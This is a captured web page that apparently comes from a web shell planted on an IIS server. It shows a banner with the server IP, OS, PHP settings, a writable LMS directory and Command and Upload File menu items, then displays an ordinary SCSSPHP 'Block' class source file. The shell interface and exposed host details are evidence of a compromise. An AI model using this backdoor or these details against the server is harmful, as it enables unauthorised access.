Server IP : 103.11.96.170 / Your IP : 18.116.28.60 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/lms/lib/scssphp/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * SCSSPHP * * @copyright 2012-2019 Leaf Corcoran * * @license http://opensource.org/licenses/MIT MIT * * @link http://scssphp.github.io/scssphp */ namespace ScssPhp\ScssPhp; /** * Block * * @author Anthon Pang <anthon.pang@gmail.com> */ class Block { /** * @var string */ public $type; /** * @var \ScssPhp\ScssPhp\Block */ public $parent; /** * @var string */ public $sourceName; /** * @var integer */ public $sourceIndex; /** * @var integer */ public $sourceLine; /** * @var integer */ public $sourceColumn; /** * @var array */ public $selectors; /** * @var array */ public $comments; /** * @var array */ public $children; /** * @var \ScssPhp\ScssPhp\Block */ public $selfParent; }